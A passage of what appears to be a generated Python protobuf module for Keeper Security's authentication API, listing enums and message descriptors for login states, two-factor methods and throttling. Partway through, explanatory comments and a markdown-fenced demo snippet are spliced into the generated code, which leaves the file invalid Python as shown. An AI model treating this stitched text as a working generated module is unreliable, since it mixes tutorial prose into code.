\x03(\x0c\x12\x0f\n\x07teamUid\x18\x02 \x03(\x0c\x12\x11\n\trecordUid\x18\x03 \x03(\x0c\x12\x17\n\x0fsharedObjectUid\x18\x04 \x01(\x0c\x12\x44\n\x15timeLimitedAccessType\x18\x05 \x01(\x0e\x32%.Authentication.TimeLimitedAccessType\x12\x12\n\nexpiration\x18\x06 \x01(\x03\"-\n\x19TimeLimitedAccessResponse\x12\x10\n\x08revision\x18\x01 \x01(\x03\"+\n\x16RequestDownloadRequest\x12\x11\n\tfileNames\x18\x01 \x03(\t\"g\n\x17RequestDownloadResponse\x12\x0e\n\x06result\x18\x01 \x01(\t\x12\x0f\n\x07message\x18\x02 \x01(\t\x12+\n\tdownloads\x18\x03 \x03(\x0b\x32\x18.Authentication.Download\"D\n\x08\x44ownload\x12\x10\n\x08\x66ileName\x18\x01 \x01(\t\x12\x0b\n\x03url\x18\x02 \x01(\t\x12\x19\n\x11successStatusCode\x18\x03'
    b' \x01(\x05\"#\n\x11\x44\x65leteUserRequest\x12\x0e\n\x06reason\x18\x01 \x01(\t*\xb9\x02\n\x11SupportedLanguage\x12\x0b\n\x07\x45NGLISH\x10\x00\x12\n\n\x06\x41RABIC\x10\x01\x12\x0b\n\x07\x42RITISH\x10\x02\x12\x0b\n\x07\x43HINESE\x10\x03\x12\x15\n\x11\x43HINESE_HONG_KONG\x10\x04\x12\x12\n\x0e\x43HINESE_TAIWAN\x10\x05\x12\t\n\x05\x44UTCH\x10\x06\x12\n\n\x06\x46RENCH\x10\x07\x12\n\n\x06GERMAN\x10\x08\x12\t\n\x05GREEK\x10\t\x12\n\n\x06HEBREW\x10\n\x12\x0b\n\x07ITALIAN\x10\x0b\x12\x0c\n\x08JAPANESE\x10\x0c\x12\n\n\x06KOREAN\x10\r\x12\n\n\x06POLISH\x10\x0e\x12\x0e\n\nPORTUGUESE\x10\x0f\x12\x15\n\x11PORTUGUESE_BRAZIL\x10\x10\x12\x0c\n\x08ROMANIAN\x10\x11\x12\x0b\n\x07RUSSIAN\x10\x12\x12\n\n\x06SLOVAK\x10\x13\x12\x0b\n\x07SPANISH\x10\x14*Z\n\tLoginType\x12\n\n\x06NORMAL\x10\x00\x12\x07\n\x03SSO\x10\x01\x12\x07\n\x03\x42IO\x10\x02\x12\r\n\tALTERNATE\x10\x03\x12\x0b\n\x07OFFLINE\x10\x04\x12\x13\n\x0f\x46ORGOT_PASSWORD\x10\x05*q\n\x0c\x44\x65viceStatus\x12\x19\n\x15\x44\x45VICE_NEEDS_APPROVAL\x10\x00\x12\r\n\tDEVICE_OK\x10\x01\x12\x1b\n\x17\x44\x45VICE_DISABLED_BY_USER\x10\x02\x12\x1a\n\x16\x44\x45VICE_LOCKED_BY_ADMIN\x10\x03*A\n\rLicenseStatus\x12\t\n\x05OTHER\x10\x00\x12\n\n\x06\x41\x43TIVE\x10\x01\x12\x0b\n\x07\x45XPIRED\x10\x02\x12\x0c\n\x08\x44ISABLED\x10\x03*7\n\x0b\x41\x63\x63ountType\x12\x0c\n\x08\x43ONSUMER\x10\x00\x12\n\n\x06\x46\x41MILY\x10\x01\x12\x0e\n\nENTERPRISE\x10\x02*\xcc\x01\n\x10SessionTokenType\x12\x12\n\x0eNO_RESTRICTION\x10\x00\x12\x14\n\x10\x41\x43\x43OUNT_RECOVERY\x10\x01\x12\x11\n\rSHARE_ACCOUNT\x10\x02\x12\x0c\n\x08PURCHASE\x10\x03\x12\x0c\n\x08RESTRICT\x10\x04\x12\x11\n\rACCEPT_INVITE\x10\x05\x12\x12\n\x0eSUPPORT_SERVER\x10\x06\x12\x17\n\x13\x45NTERPRISE_CREATION\x10\x07\x12\x1f\n\x1b\x45XPIRED_BUT_ALLOWED_TO_SYNC\x10\x08*G\n\x07Version\x12\x13\n\x0finvalid_version\x10\x00\x12\x13\n\x0f\x64\x65\x66\x61ult_version\x10\x01\x12\x12\n\x0esecond_version\x10\x02*7\n\x1fMasterPasswordReentryActionType\x12\n\n\x06UNMASK\x10\x00\x12\x08\n\x04\x43OPY\x10\x01*l'
    b'\n\x0bLoginMethod\x12\x17\n\x13INVALID_LOGINMETHOD\x10\x00\x12\x14\n\x10\x45XISTING_ACCOUNT\x10\x01\x12\x0e\n\nSSO_DOMAIN\x10\x02\x12\r\n\tAFTER_SSO\x10\x03\x12\x0f\n\x0bNEW_ACCOUNT\x10\x04*\xc7\x03\n\nLoginState\x12\x16\n\x12INVALID_LOGINSTATE\x10\x00\x12\x0e\n\nLOGGED_OUT\x10\x01\x12\x1c\n\x18\x44\x45VICE_APPROVAL_REQUIRED\x10\x02\x12\x11\n\rDEVICE_LOCKED\x10\x03\x12\x12\n\x0e\x41\x43\x43OUNT_LOCKED\x10\x04\x12\x19\n\x15\x44\x45VICE_ACCOUNT_LOCKED\x10\x05\x12\x0b\n\x07UPGRADE\x10\x06\x12\x13\n\x0fLICENSE_EXPIRED\x10\x07\x12\x13\n\x0fREGION_REDIRECT\x10\x08\x12\x16\n\x12REDIRECT_CLOUD_SSO\x10\t\x12\x17\n\x13REDIRECT_ONSITE_SSO\x10\n\x12\x10\n\x0cREQUIRES_2FA\x10\x0c\x12\x16\n\x12REQUIRES_AUTH_HASH\x10\r\x12\x15\n\x11REQUIRES_USERNAME\x10\x0e\x12\x19\n\x15\x41\x46TER_CLOUD_SSO_LOGIN\x10\x0f\x12\x1d\n\x19REQUIRES_ACCOUNT_CREATION\x10\x10\x12&\n\"REQUIRES_DEVICE_ENCRYPTED_DATA_KEY\x10\x11\x12\x17\n\x13LOGIN_TOKEN_EXPIRED\x10\x12\x12\r\n\tLOGGED_IN\x10\x63*k\n\x14\x45ncryptedDataKeyType\x12\n\n\x06NO_KEY\x10\x00\x12\x18\n\x14\x42Y_DEVICE_PUBLIC_KEY\x10\x01\x12\x0f\n\x0b\x42Y_PASSWORD\x10\x02\x12\x10\n\x0c\x42Y_ALTERNATE\x10\x03\x12\n\n\x06\x42Y_BIO\x10\x04*-\n\x0ePasswordMethod\x12\x0b\n\x07\x45NTERED\x10\x00\x12\x0e\n\nBIOMETRICS\x10\x01*\xb9\x01\n\x11TwoFactorPushType\x12\x14\n\x10TWO_FA_PUSH_NONE\x10\x00\x12\x13\n\x0fTWO_FA_PUSH_SMS\x10\x01\x12\x16\n\x12TWO_FA_PUSH_KEEPER\x10\x02\x12\x18\n\x14TWO_FA_PUSH_DUO_PUSH\x10\x03\x12\x18\n\x14TWO_FA_PUSH_DUO_TEXT\x10\x04\x12\x18\n\x14TWO_FA_PUSH_DUO_CALL\x10\x05\x12\x13\n\x0fTWO_FA_PUSH_DNA\x10\x06*\xc3\x01\n\x12TwoFactorValueType\x12\x14\n\x10TWO_FA_CODE_NONE\x10\x00\x12\x14\n\x10TWO_FA_CODE_TOTP\x10\x01\x12\x13\n\x0fTWO_FA_CODE_SMS\x10\x02\x12\x13\n\x0fTWO_FA_CODE_DUO\x10\x03\x12\x13\n\x0fTWO_FA_CODE_RSA\x10\x04\x12\x13\n\x0fTWO_FA_RESP_U2F\x10\x05\x12\x18\n\x14TWO_FA_RESP_WEBAUTHN\x10\x06\x12\x13\n\x0fTWO_FA_CODE_DNA\x10\x07*\xe1\x01\n\x14TwoFactorChannelType\x12\x12\n\x0eTWO_FA_CT_NONE\x10\x00\x12\x12\n\x0eTWO_FA_CT_TOTP'
    b'\x10\x01\x12\x11\n\rTWO_FA_CT_SMS\x10\x02\x12\x11\n\rTWO_FA_CT_DUO\x10\x03\x12\x11\n\rTWO_FA_CT_RSA\x10\x04\x12\x14\n\x10TWO_FA_CT_BACKUP\x10\x05\x12\x11\n\rTWO_FA_CT_U2F\x10\x06\x12\x16\n\x12TWO_FA_CT_WEBAUTHN\x10\x07\x12\x14\n\x10TWO_FA_CT_KEEPER\x10\x08\x12\x11\n\rTWO_FA_CT_DNA\x10\t*\xab\x01\n\x13TwoFactorExpiration\x12\x1a\n\x16TWO_FA_EXP_IMMEDIATELY\x10\x00\x12\x18\n\x14TWO_FA_EXP_5_MINUTES\x10\x01\x12\x17\n\x13TWO_FA_EXP_12_HOURS\x10\x02\x12\x17\n\x13TWO_FA_EXP_24_HOURS\x10\x03\x12\x16\n\x12TWO_FA_EXP_30_DAYS\x10\x04\x12\x14\n\x10TWO_FA_EXP_NEVER\x10\x05*@\n\x0bLicenseType\x12\t\n\x05VAULT\x10\x00\x12\x08\n\x04\x43HAT\x10\x01\x12\x0b\n\x07STORAGE\x10\x02\x12\x0f\n\x0b\x42REACHWATCH\x10\x03*i\n\x0bObjectTypes\x12\n\n\x06RECORD\x10\x00\x12\x16\n\x12SHARED_FOLDER_USER\x10\x01\x12\x16\n\x12SHARED_FOLDER_TEAM\x10\x02\x12\x0f\n\x0bUSER_FOLDER\x10\x03\x12\r\n\tTEAM_USER\x10\x04*`\n\x1b\x41lternateAuthenticationType\x12\x1d\n\x19\x41LTERNATE_MASTER_PASSWORD\x10\x00\x12\r\n\tBIOMETRIC\x10\x01\x12\x13\n\x0f\x41\x43\x43OUNT_RECOVER\x10\x02*\x9a\x02\n\x0cThrottleType\x12\x1b\n\x17PASSWORD_RETRY_THROTTLE\x10\x00\x12\"\n\x1ePASSWORD_RETRY_LEGACY_THROTTLE\x10\x01\x12\x13\n\x0fTWO_FA_THROTTLE\x10\x02\x12\x1a\n\x16TWO_FA_LEGACY_THROTTLE\x10\x03\x12\x15\n\x11QA_RETRY_THROTTLE\x10\x04\x12\x1c\n\x18\x41\x43\x43OUNT_RECOVER_THROTTLE\x10\x05\x12.\n*VALIDATE_DEVICE_VERIFICATION_CODE_THROTTLE\x10\x06\x12\x33\n/VALIDATE_CREATE_USER_VERIFICATION_CODE_THROTTLE\x10\x07*8\n\x06Region\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x06\n\x02\x65u\x10\x01\x12\x06\n\x02us\x10\x02\x12\t\n\x05usgov\x10\x03\x12\x06\n\x02\x61u\x10\x04*D\n\x14\x41pplicationShareType\x12\x15\n\x11SHARE_TYPE_RECORD\x10\x00\x12\x15\n\x11SHARE_TYPE_FOLDER\x10\x01*\xa4\x01\n\x15TimeLimitedAccessType\x12$\n'
    b' INVALID_TIME_LIMITED_ACCESS_TYPE\x10\x00\x12\x19\n\x15USER_ACCESS_TO_RECORD\x10\x01\x12\'\n#USER_OR_TEAM_ACCESS_TO_SHAREDFOLDER\x10\x02\x12!\n\x1dRECORD_ACCESS_TO_SHAREDFOLDER\x10\x03\x42*\n\x18\x63om.keepersecurity.protoB\x0e\x41uthenticationb\x06proto3'
)
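# The call above registers the serialized FileDescriptorProto for
# APIRequest.proto in the process-wide default descriptor pool. A minimal
# sketch of the same mechanism follows; the file name ('demo.proto'),
# package ('Demo'), and message ('Ping') are made up for illustration,
# and a private pool is used so nothing collides with real descriptors.

```python
from google.protobuf import descriptor_pb2, descriptor_pool

# Build a tiny FileDescriptorProto by hand (protoc normally does this).
fdp = descriptor_pb2.FileDescriptorProto()
fdp.name = 'demo.proto'
fdp.package = 'Demo'
fdp.syntax = 'proto3'
msg = fdp.message_type.add()
msg.name = 'Ping'
field = msg.field.add()
field.name = 'id'
field.number = 1
field.type = descriptor_pb2.FieldDescriptorProto.TYPE_INT32
field.label = descriptor_pb2.FieldDescriptorProto.LABEL_OPTIONAL

# AddSerializedFile parses the bytes as a FileDescriptorProto and
# returns the resulting FileDescriptor, exactly like the call above.
pool = descriptor_pool.DescriptorPool()
file_desc = pool.AddSerializedFile(fdp.SerializeToString())
print(file_desc.name)
print(pool.FindMessageTypeByName('Demo.Ping').fields[0].name)
```

# Generated modules call Default() instead of creating a pool, so every
# imported _pb2 module (here, enterprise_pb2 and this file) shares one pool
# and cross-file type references like .Enterprise.EnterpriseRegistration
# resolve.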
# Top-level enum aliases: one EnumTypeWrapper per enum defined in APIRequest.proto.
_SUPPORTEDLANGUAGE = DESCRIPTOR.enum_types_by_name['SupportedLanguage']
SupportedLanguage = enum_type_wrapper.EnumTypeWrapper(_SUPPORTEDLANGUAGE)
_LOGINTYPE = DESCRIPTOR.enum_types_by_name['LoginType']
LoginType = enum_type_wrapper.EnumTypeWrapper(_LOGINTYPE)
_DEVICESTATUS = DESCRIPTOR.enum_types_by_name['DeviceStatus']
DeviceStatus = enum_type_wrapper.EnumTypeWrapper(_DEVICESTATUS)
_LICENSESTATUS = DESCRIPTOR.enum_types_by_name['LicenseStatus']
LicenseStatus = enum_type_wrapper.EnumTypeWrapper(_LICENSESTATUS)
_ACCOUNTTYPE = DESCRIPTOR.enum_types_by_name['AccountType']
AccountType = enum_type_wrapper.EnumTypeWrapper(_ACCOUNTTYPE)
_SESSIONTOKENTYPE = DESCRIPTOR.enum_types_by_name['SessionTokenType']
SessionTokenType = enum_type_wrapper.EnumTypeWrapper(_SESSIONTOKENTYPE)
_VERSION = DESCRIPTOR.enum_types_by_name['Version']
Version = enum_type_wrapper.EnumTypeWrapper(_VERSION)
_MASTERPASSWORDREENTRYACTIONTYPE = DESCRIPTOR.enum_types_by_name['MasterPasswordReentryActionType']
MasterPasswordReentryActionType = enum_type_wrapper.EnumTypeWrapper(_MASTERPASSWORDREENTRYACTIONTYPE)
_LOGINMETHOD = DESCRIPTOR.enum_types_by_name['LoginMethod']
LoginMethod = enum_type_wrapper.EnumTypeWrapper(_LOGINMETHOD)
_LOGINSTATE = DESCRIPTOR.enum_types_by_name['LoginState']
LoginState = enum_type_wrapper.EnumTypeWrapper(_LOGINSTATE)
_ENCRYPTEDDATAKEYTYPE = DESCRIPTOR.enum_types_by_name['EncryptedDataKeyType']
EncryptedDataKeyType = enum_type_wrapper.EnumTypeWrapper(_ENCRYPTEDDATAKEYTYPE)
_PASSWORDMETHOD = DESCRIPTOR.enum_types_by_name['PasswordMethod']
PasswordMethod = enum_type_wrapper.EnumTypeWrapper(_PASSWORDMETHOD)
_TWOFACTORPUSHTYPE = DESCRIPTOR.enum_types_by_name['TwoFactorPushType']
TwoFactorPushType = enum_type_wrapper.EnumTypeWrapper(_TWOFACTORPUSHTYPE)
_TWOFACTORVALUETYPE = DESCRIPTOR.enum_types_by_name['TwoFactorValueType']
TwoFactorValueType = enum_type_wrapper.EnumTypeWrapper(_TWOFACTORVALUETYPE)
_TWOFACTORCHANNELTYPE = DESCRIPTOR.enum_types_by_name['TwoFactorChannelType']
TwoFactorChannelType = enum_type_wrapper.EnumTypeWrapper(_TWOFACTORCHANNELTYPE)
_TWOFACTOREXPIRATION = DESCRIPTOR.enum_types_by_name['TwoFactorExpiration']
TwoFactorExpiration = enum_type_wrapper.EnumTypeWrapper(_TWOFACTOREXPIRATION)
_LICENSETYPE = DESCRIPTOR.enum_types_by_name['LicenseType']
LicenseType = enum_type_wrapper.EnumTypeWrapper(_LICENSETYPE)
_OBJECTTYPES = DESCRIPTOR.enum_types_by_name['ObjectTypes']
ObjectTypes = enum_type_wrapper.EnumTypeWrapper(_OBJECTTYPES)
_ALTERNATEAUTHENTICATIONTYPE = DESCRIPTOR.enum_types_by_name['AlternateAuthenticationType']
AlternateAuthenticationType = enum_type_wrapper.EnumTypeWrapper(_ALTERNATEAUTHENTICATIONTYPE)
_THROTTLETYPE = DESCRIPTOR.enum_types_by_name['ThrottleType']
ThrottleType = enum_type_wrapper.EnumTypeWrapper(_THROTTLETYPE)
_REGION = DESCRIPTOR.enum_types_by_name['Region']
Region = enum_type_wrapper.EnumTypeWrapper(_REGION)
_APPLICATIONSHARETYPE = DESCRIPTOR.enum_types_by_name['ApplicationShareType']
ApplicationShareType = enum_type_wrapper.EnumTypeWrapper(_APPLICATIONSHARETYPE)
_TIMELIMITEDACCESSTYPE = DESCRIPTOR.enum_types_by_name['TimeLimitedAccessType']
TimeLimitedAccessType = enum_type_wrapper.EnumTypeWrapper(_TIMELIMITEDACCESSTYPE)
ENGLISH = 0
ARABIC = 1
BRITISH = 2
CHINESE = 3
CHINESE_HONG_KONG = 4
CHINESE_TAIWAN = 5
DUTCH = 6
FRENCH = 7
GERMAN = 8
GREEK = 9
HEBREW = 10
ITALIAN = 11
JAPANESE = 12
KOREAN = 13
POLISH = 14
PORTUGUESE = 15
PORTUGUESE_BRAZIL = 16
ROMANIAN = 17
RUSSIAN = 18
SLOVAK = 19
SPANISH = 20
NORMAL = 0
SSO = 1
BIO = 2
ALTERNATE = 3
OFFLINE = 4
FORGOT_PASSWORD = 5
DEVICE_NEEDS_APPROVAL = 0
DEVICE_OK = 1
DEVICE_DISABLED_BY_USER = 2
DEVICE_LOCKED_BY_ADMIN = 3
OTHER = 0
ACTIVE = 1
EXPIRED = 2
DISABLED = 3
CONSUMER = 0
FAMILY = 1
ENTERPRISE = 2
NO_RESTRICTION = 0
ACCOUNT_RECOVERY = 1
SHARE_ACCOUNT = 2
PURCHASE = 3
RESTRICT = 4
ACCEPT_INVITE = 5
SUPPORT_SERVER = 6
ENTERPRISE_CREATION = 7
EXPIRED_BUT_ALLOWED_TO_SYNC = 8
invalid_version = 0
default_version = 1
second_version = 2
UNMASK = 0
COPY = 1
INVALID_LOGINMETHOD = 0
EXISTING_ACCOUNT = 1
SSO_DOMAIN = 2
AFTER_SSO = 3
NEW_ACCOUNT = 4
INVALID_LOGINSTATE = 0
LOGGED_OUT = 1
DEVICE_APPROVAL_REQUIRED = 2
DEVICE_LOCKED = 3
ACCOUNT_LOCKED = 4
DEVICE_ACCOUNT_LOCKED = 5
UPGRADE = 6
LICENSE_EXPIRED = 7
REGION_REDIRECT = 8
REDIRECT_CLOUD_SSO = 9
REDIRECT_ONSITE_SSO = 10
REQUIRES_2FA = 12
REQUIRES_AUTH_HASH = 13
REQUIRES_USERNAME = 14
AFTER_CLOUD_SSO_LOGIN = 15
REQUIRES_ACCOUNT_CREATION = 16
REQUIRES_DEVICE_ENCRYPTED_DATA_KEY = 17
LOGIN_TOKEN_EXPIRED = 18
LOGGED_IN = 99
NO_KEY = 0
BY_DEVICE_PUBLIC_KEY = 1
BY_PASSWORD = 2
BY_ALTERNATE = 3
BY_BIO = 4
ENTERED = 0
BIOMETRICS = 1
TWO_FA_PUSH_NONE = 0
TWO_FA_PUSH_SMS = 1
TWO_FA_PUSH_KEEPER = 2
TWO_FA_PUSH_DUO_PUSH = 3
TWO_FA_PUSH_DUO_TEXT = 4
TWO_FA_PUSH_DUO_CALL = 5
TWO_FA_PUSH_DNA = 6
TWO_FA_CODE_NONE = 0
TWO_FA_CODE_TOTP = 1
TWO_FA_CODE_SMS = 2
TWO_FA_CODE_DUO = 3
TWO_FA_CODE_RSA = 4
TWO_FA_RESP_U2F = 5
TWO_FA_RESP_WEBAUTHN = 6
TWO_FA_CODE_DNA = 7
TWO_FA_CT_NONE = 0
TWO_FA_CT_TOTP = 1
TWO_FA_CT_SMS = 2
TWO_FA_CT_DUO = 3
TWO_FA_CT_RSA = 4
TWO_FA_CT_BACKUP = 5
TWO_FA_CT_U2F = 6
TWO_FA_CT_WEBAUTHN = 7
TWO_FA_CT_KEEPER = 8
TWO_FA_CT_DNA = 9
TWO_FA_EXP_IMMEDIATELY = 0
TWO_FA_EXP_5_MINUTES = 1
TWO_FA_EXP_12_HOURS = 2
TWO_FA_EXP_24_HOURS = 3
TWO_FA_EXP_30_DAYS = 4
TWO_FA_EXP_NEVER = 5
VAULT = 0
CHAT = 1
STORAGE = 2
BREACHWATCH = 3
RECORD = 0
SHARED_FOLDER_USER = 1
SHARED_FOLDER_TEAM = 2
USER_FOLDER = 3
TEAM_USER = 4
ALTERNATE_MASTER_PASSWORD = 0
BIOMETRIC = 1
ACCOUNT_RECOVER = 2
PASSWORD_RETRY_THROTTLE = 0
PASSWORD_RETRY_LEGACY_THROTTLE = 1
TWO_FA_THROTTLE = 2
TWO_FA_LEGACY_THROTTLE = 3
QA_RETRY_THROTTLE = 4
ACCOUNT_RECOVER_THROTTLE = 5
VALIDATE_DEVICE_VERIFICATION_CODE_THROTTLE = 6
VALIDATE_CREATE_USER_VERIFICATION_CODE_THROTTLE = 7
UNKNOWN = 0
eu = 1
us = 2
usgov = 3
au = 4
SHARE_TYPE_RECORD = 0
SHARE_TYPE_FOLDER = 1
INVALID_TIME_LIMITED_ACCESS_TYPE = 0
USER_ACCESS_TO_RECORD = 1
USER_OR_TEAM_ACCESS_TO_SHAREDFOLDER = 2
RECORD_ACCESS_TO_SHAREDFOLDER = 3
_APIREQUEST = DESCRIPTOR.message_types_by_name['ApiRequest']
_APIREQUESTPAYLOAD = DESCRIPTOR.message_types_by_name['ApiRequestPayload']
_TRANSFORM = DESCRIPTOR.message_types_by_name['Transform']
_DEVICEREQUEST = DESCRIPTOR.message_types_by_name['DeviceRequest']
_AUTHREQUEST = DESCRIPTOR.message_types_by_name['AuthRequest']
_NEWUSERMINIMUMPARAMS = DESCRIPTOR.message_types_by_name['NewUserMinimumParams']
_PRELOGINREQUEST = DESCRIPTOR.message_types_by_name['PreLoginRequest']
_LOGINREQUEST = DESCRIPTOR.message_types_by_name['LoginRequest']
_DEVICERESPONSE = DESCRIPTOR.message_types_by_name['DeviceResponse']
_SALT = DESCRIPTOR.message_types_by_name['Salt']
_TWOFACTORCHANNEL = DESCRIPTOR.message_types_by_name['TwoFactorChannel']
_STARTLOGINREQUEST = DESCRIPTOR.message_types_by_name['StartLoginRequest']
_LOGINRESPONSE = DESCRIPTOR.message_types_by_name['LoginResponse']
_SSOUSERINFO = DESCRIPTOR.message_types_by_name['SsoUserInfo']
_PRELOGINRESPONSE = DESCRIPTOR.message_types_by_name['PreLoginResponse']
_LOGINASUSERREQUEST = DESCRIPTOR.message_types_by_name['LoginAsUserRequest']
_LOGINASUSERRESPONSE = DESCRIPTOR.message_types_by_name['LoginAsUserResponse']
_VALIDATEAUTHHASHREQUEST = DESCRIPTOR.message_types_by_name['ValidateAuthHashRequest']
_TWOFACTORCHANNELINFO = DESCRIPTOR.message_types_by_name['TwoFactorChannelInfo']
_TWOFACTORDUOSTATUS = DESCRIPTOR.message_types_by_name['TwoFactorDuoStatus']
_TWOFACTORADDREQUEST = DESCRIPTOR.message_types_by_name['TwoFactorAddRequest']
_TWOFACTORRENAMEREQUEST = DESCRIPTOR.message_types_by_name['TwoFactorRenameRequest']
_TWOFACTORADDRESPONSE = DESCRIPTOR.message_types_by_name['TwoFactorAddResponse']
_TWOFACTORDELETEREQUEST = DESCRIPTOR.message_types_by_name['TwoFactorDeleteRequest']
_TWOFACTORLISTRESPONSE = DESCRIPTOR.message_types_by_name['TwoFactorListResponse']
_TWOFACTORUPDATEEXPIRATIONREQUEST = DESCRIPTOR.message_types_by_name['TwoFactorUpdateExpirationRequest']
_TWOFACTORVALIDATEREQUEST = DESCRIPTOR.message_types_by_name['TwoFactorValidateRequest']
_TWOFACTORVALIDATERESPONSE = DESCRIPTOR.message_types_by_name['TwoFactorValidateResponse']
_TWOFACTORSENDPUSHREQUEST = DESCRIPTOR.message_types_by_name['TwoFactorSendPushRequest']
_LICENSE = DESCRIPTOR.message_types_by_name['License']
_OWNERLESSRECORD = DESCRIPTOR.message_types_by_name['OwnerlessRecord']
_OWNERLESSRECORDS = DESCRIPTOR.message_types_by_name['OwnerlessRecords']
_USERAUTHREQUEST = DESCRIPTOR.message_types_by_name['UserAuthRequest']
_UIDREQUEST = DESCRIPTOR.message_types_by_name['UidRequest']
_DEVICEUPDATEREQUEST = DESCRIPTOR.message_types_by_name['DeviceUpdateRequest']
_REGISTERDEVICEINREGIONREQUEST = DESCRIPTOR.message_types_by_name['RegisterDeviceInRegionRequest']
_REGISTRATIONREQUEST = DESCRIPTOR.message_types_by_name['RegistrationRequest']
_CONVERTUSERTOV3REQUEST = DESCRIPTOR.message_types_by_name['ConvertUserToV3Request']
_REVISIONRESPONSE = DESCRIPTOR.message_types_by_name['RevisionResponse']
_CHANGEEMAILREQUEST = DESCRIPTOR.message_types_by_name['ChangeEmailRequest']
_CHANGEEMAILRESPONSE = DESCRIPTOR.message_types_by_name['ChangeEmailResponse']
_EMAILVERIFICATIONLINKRESPONSE = DESCRIPTOR.message_types_by_name['EmailVerificationLinkResponse']
_SECURITYDATA = DESCRIPTOR.message_types_by_name['SecurityData']
_SECURITYDATAREQUEST = DESCRIPTOR.message_types_by_name['SecurityDataRequest']
_SECURITYREPORTINCREMENTALDATA = DESCRIPTOR.message_types_by_name['SecurityReportIncrementalData']
_SECURITYREPORT = DESCRIPTOR.message_types_by_name['SecurityReport']
_SECURITYREPORTSAVEREQUEST = DESCRIPTOR.message_types_by_name['SecurityReportSaveRequest']
_SECURITYREPORTREQUEST = DESCRIPTOR.message_types_by_name['SecurityReportRequest']
_SECURITYREPORTRESPONSE = DESCRIPTOR.message_types_by_name['SecurityReportResponse']
_REUSEDPASSWORDSREQUEST = DESCRIPTOR.message_types_by_name['ReusedPasswordsRequest']
_SUMMARYCONSOLEREPORT = DESCRIPTOR.message_types_by_name['SummaryConsoleReport']
_CHANGETOKEYTYPEONE = DESCRIPTOR.message_types_by_name['ChangeToKeyTypeOne']
_CHANGETOKEYTYPEONEREQUEST = DESCRIPTOR.message_types_by_name['ChangeToKeyTypeOneRequest']
_CHANGETOKEYTYPEONESTATUS = DESCRIPTOR.message_types_by_name['ChangeToKeyTypeOneStatus']
_CHANGETOKEYTYPEONERESPONSE = DESCRIPTOR.message_types_by_name['ChangeToKeyTypeOneResponse']
_SETKEY = DESCRIPTOR.message_types_by_name['SetKey']
_SETKEYREQUEST = DESCRIPTOR.message_types_by_name['SetKeyRequest']
_CREATEUSERREQUEST = DESCRIPTOR.message_types_by_name['CreateUserRequest']
_NODEENFORCEMENTADDORUPDATEREQUEST = DESCRIPTOR.message_types_by_name['NodeEnforcementAddOrUpdateRequest']
_NODEENFORCEMENTREMOVEREQUEST = DESCRIPTOR.message_types_by_name['NodeEnforcementRemoveRequest']
_APIREQUESTBYKEY = DESCRIPTOR.message_types_by_name['ApiRequestByKey']
_MEMCACHEREQUEST = DESCRIPTOR.message_types_by_name['MemcacheRequest']
_MEMCACHERESPONSE = DESCRIPTOR.message_types_by_name['MemcacheResponse']
_MASTERPASSWORDREENTRYREQUEST = DESCRIPTOR.message_types_by_name['MasterPasswordReentryRequest']
_DEVICEREGISTRATIONREQUEST = DESCRIPTOR.message_types_by_name['DeviceRegistrationRequest']
_DEVICEVERIFICATIONREQUEST = DESCRIPTOR.message_types_by_name['DeviceVerificationRequest']
_DEVICEVERIFICATIONRESPONSE = DESCRIPTOR.message_types_by_name['DeviceVerificationResponse']
_DEVICEAPPROVALREQUEST = DESCRIPTOR.message_types_by_name['DeviceApprovalRequest']
_DEVICEAPPROVALRESPONSE = DESCRIPTOR.message_types_by_name['DeviceApprovalResponse']
_APPROVEDEVICEREQUEST = DESCRIPTOR.message_types_by_name['ApproveDeviceRequest']
_ENTERPRISEUSERALIASREQUEST = DESCRIPTOR.message_types_by_name['EnterpriseUserAliasRequest']
_ENTERPRISEUSERADDALIASREQUEST = DESCRIPTOR.message_types_by_name['EnterpriseUserAddAliasRequest']
_DEVICE = DESCRIPTOR.message_types_by_name['Device']
_REGISTERDEVICEDATAKEYREQUEST = DESCRIPTOR.message_types_by_name['RegisterDeviceDataKeyRequest']
_VALIDATECREATEUSERVERIFICATIONCODEREQUEST = DESCRIPTOR.message_types_by_name['ValidateCreateUserVerificationCodeRequest']
_VALIDATEDEVICEVERIFICATIONCODEREQUEST = DESCRIPTOR.message_types_by_name['ValidateDeviceVerificationCodeRequest']
_SENDSESSIONMESSAGEREQUEST = DESCRIPTOR.message_types_by_name['SendSessionMessageRequest']
_GLOBALUSERACCOUNT = DESCRIPTOR.message_types_by_name['GlobalUserAccount']
_ACCOUNTUSERNAME = DESCRIPTOR.message_types_by_name['AccountUsername']
_SSOSERVICEPROVIDERREQUEST = DESCRIPTOR.message_types_by_name['SsoServiceProviderRequest']
_SSOSERVICEPROVIDERRESPONSE = DESCRIPTOR.message_types_by_name['SsoServiceProviderResponse']
_USERSETTINGREQUEST = DESCRIPTOR.message_types_by_name['UserSettingRequest']
_THROTTLESTATE = DESCRIPTOR.message_types_by_name['ThrottleState']
_THROTTLESTATE2 = DESCRIPTOR.message_types_by_name['ThrottleState2']
_DEVICEINFORMATION = DESCRIPTOR.message_types_by_name['DeviceInformation']
_USERSETTING = DESCRIPTOR.message_types_by_name['UserSetting']
_USERDATAKEYREQUEST = DESCRIPTOR.message_types_by_name['UserDataKeyRequest']
_ENTERPRISEUSERIDDATAKEYPAIR = DESCRIPTOR.message_types_by_name['EnterpriseUserIdDataKeyPair']
_USERDATAKEY = DESCRIPTOR.message_types_by_name['UserDataKey']
_USERDATAKEYRESPONSE = DESCRIPTOR.message_types_by_name['UserDataKeyResponse']
_MASTERPASSWORDRECOVERYVERIFICATIONREQUEST = DESCRIPTOR.message_types_by_name['MasterPasswordRecoveryVerificationRequest']
_GETSECURITYQUESTIONV3REQUEST = DESCRIPTOR.message_types_by_name['GetSecurityQuestionV3Request']
_GETSECURITYQUESTIONV3RESPONSE = DESCRIPTOR.message_types_by_name['GetSecurityQuestionV3Response']
_GETDATAKEYBACKUPV3REQUEST = DESCRIPTOR.message_types_by_name['GetDataKeyBackupV3Request']
_PASSWORDRULES = DESCRIPTOR.message_types_by_name['PasswordRules']
_GETDATAKEYBACKUPV3RESPONSE = DESCRIPTOR.message_types_by_name['GetDataKeyBackupV3Response']
_GETPUBLICKEYSREQUEST = DESCRIPTOR.message_types_by_name['GetPublicKeysRequest']
_PUBLICKEYRESPONSE = DESCRIPTOR.message_types_by_name['PublicKeyResponse']
_GETPUBLICKEYSRESPONSE = DESCRIPTOR.message_types_by_name['GetPublicKeysResponse']
_SETECCKEYPAIRREQUEST = DESCRIPTOR.message_types_by_name['SetEccKeyPairRequest']
_ADDAPPSHARESREQUEST = DESCRIPTOR.message_types_by_name['AddAppSharesRequest']
